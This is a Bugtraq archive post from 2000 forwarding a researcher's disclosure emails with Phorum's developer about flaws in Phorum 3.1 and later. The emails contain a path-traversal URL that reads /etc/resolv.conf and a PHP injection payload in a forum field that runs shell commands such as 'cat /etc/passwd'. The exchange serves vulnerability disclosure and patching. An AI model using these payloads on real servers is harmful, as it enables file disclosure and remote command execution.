Bugtraq mailing list archives
More on Phorum security problems, correction and updates
From: João Gouveia <cercthar () TELEWEB PT>
Date: Thu, 23 Nov 2000 18:58:15 -0000
The new 2.3.7 version of Phorum released to correct this security problems does not correct the problem, although exploited in diferent way. ( description sent to vuln-help team ). I mentioned in my first message that it was possible do disclose the Phorum's master password by calling a php file. That is not true. It is possible to do it, but not just by calling a file. Attachted to this message are the mails I wrote to Phorum's staff regarding this issue(s). Best regards, Joao Gouveia aka Tharbad.
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 18:52:57 -0000
Hi again, sorry for insisting with thisI don't believe that the admin master password (or the per-forum mod passwords) are echoed by the admin pages. The database password isProviding that forums.php is writeable ( as in readme.txt is told to ) <quote> 3. Give write permissions to the webserver on the configuration files. > cd [inf_path] > chmod 707 forums.php > chmod 706 forums.bak.php </quote> Since we can, hipoteticaly, run our own php code, it's still possible to manage a way to echo the password. Best regards, Joao Gouveia aka Tharbad.
--- End Message ---
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 18:33:25 -0000
----- Original Message ----- From: "Jason Birch" <jason () phorum org> To: "João Gouveia" <cercthar () teleweb pt> Sent: Thursday, November 23, 2000 6:00 PM Subject: Re: Security flaw in Phorum 3.1 and higherOn Thu, 23 Nov 2000 14:39:04 -0000, João Gouveia <cercthar () teleweb pt> spoke:I am refering to existent scripts. This situation, of course, is only possible if the malicious user knows about the first problem ( the possibility of reading other scripts like master.php ). Having access dothemaster password one can modify some existent forum.I don't believe that the admin master password (or the per-forum mod passwords) are echoed by the admin pages. The database password is though. I can see this being a problem if: a) the database password leaks b) the database accepts connections from outside the local network or localhost.Of course.. my stupid mistake. The password showned is in <id>.php, the password of _a_ forum. Sorry about that.. I'll send an email do vuln-help correcting this, hope it arrives on time! Best regards, Joao Gouveia aka Tharbad.
--- End Message ---
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 16:53:54 -0000
Hi jason, The fix that is provided in Phorum's site doesn't efficiently take care of the security flaw. There is still a way of exploiting it.. Try this: http://phorum.org/support/common.php?f=0&ForumLang=../../../../../../../etc/ resolv.conf Best regards, Joao Gouveia aka Tharbad
--- End Message ---
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 14:39:04 -0000
Hi, ----- Original Message ----- From: "Jason Birch" <jason () phorum org> To: <cercthar () teleweb pt> Sent: Thursday, November 23, 2000 7:54 AM Subject: Re: Security flaw in Phorum 3.1 and higher..And it could allow executing arbitrary code. I sent this issue to vuln-help team of securityfocus in 11-20-2000. It seems that they are on "vacations" and didn't touch it..The only way that I can see it allowing arbitrary (hacker-specified) code is if the admin has allow_uploads turned on. What am I missing? Or are you referring to existing php scripts elsewhere on the server?I am refering to existent scripts. This situation, of course, is only possible if the malicious user knows about the first problem ( the possibility of reading other scripts like master.php ). Having access do the master password one can modify some existent forum. <quote> ... if($rec->folder=="0"){ $data.=" \$ForumDisplay='$rec->display';\n"; $data.=" \$ForumTableName='$rec->table_name';\n"; $data.=" \$ForumModeration='$rec->moderation';\n"; $data.=" \$ForumModEmail='$rec->mod_email';\n"; $data.=" \$ForumModPass='$rec->mod_pass';\n"; .... $fp = fopen("$admindir/forums/$rec->id.php", "w"); fputs($fp, $data); ... </quote> So, we can add our php code to the fields. Using the master password obtained with the first problem, we edit one of the existent forums and we add something like, for example in the 'ForumModEmail'field: mod () vuln host tld';system($com);echo' This would execute our code, suplied in var 'com'. For example: forum/list.php?f=1&com=cat%20/etc/passwdI can't say that I'm upset that securityfocus missed it. Gave us more time to respond. As far as I know, we were not informed until 2000-11-21. If you see anything like this in the future, I wouldYou didn't get the point.. sending this to vulnerability-help of securityfocus doesn't mean send it to bugtraq or something. The goal of this is to let them do the work of advising the vendors, discuss the problem with the vendors, etc.. Not that i can't do it, but if they exist, makes my live easier. Unfortunaly, this only worked 1 time for me, I never got replies from the others ( including Phorum's problem ).really appreciate it if you could let us know directly at core () phorum org as soon as you suspect a problem. I am dedicated to fixing security-related issues with Phorum as quickly as possible.Glad to know that. As i stated above, that's the porpose of working with vuln-help team. One of their conditions is that they get to make the first contact with the vendor. That's why I was waiting. Best regards, Joao Gouveia aka Tharbad
--- End Message ---
Current thread:
- More on Phorum security problems, correction and updates João Gouveia (Nov 25)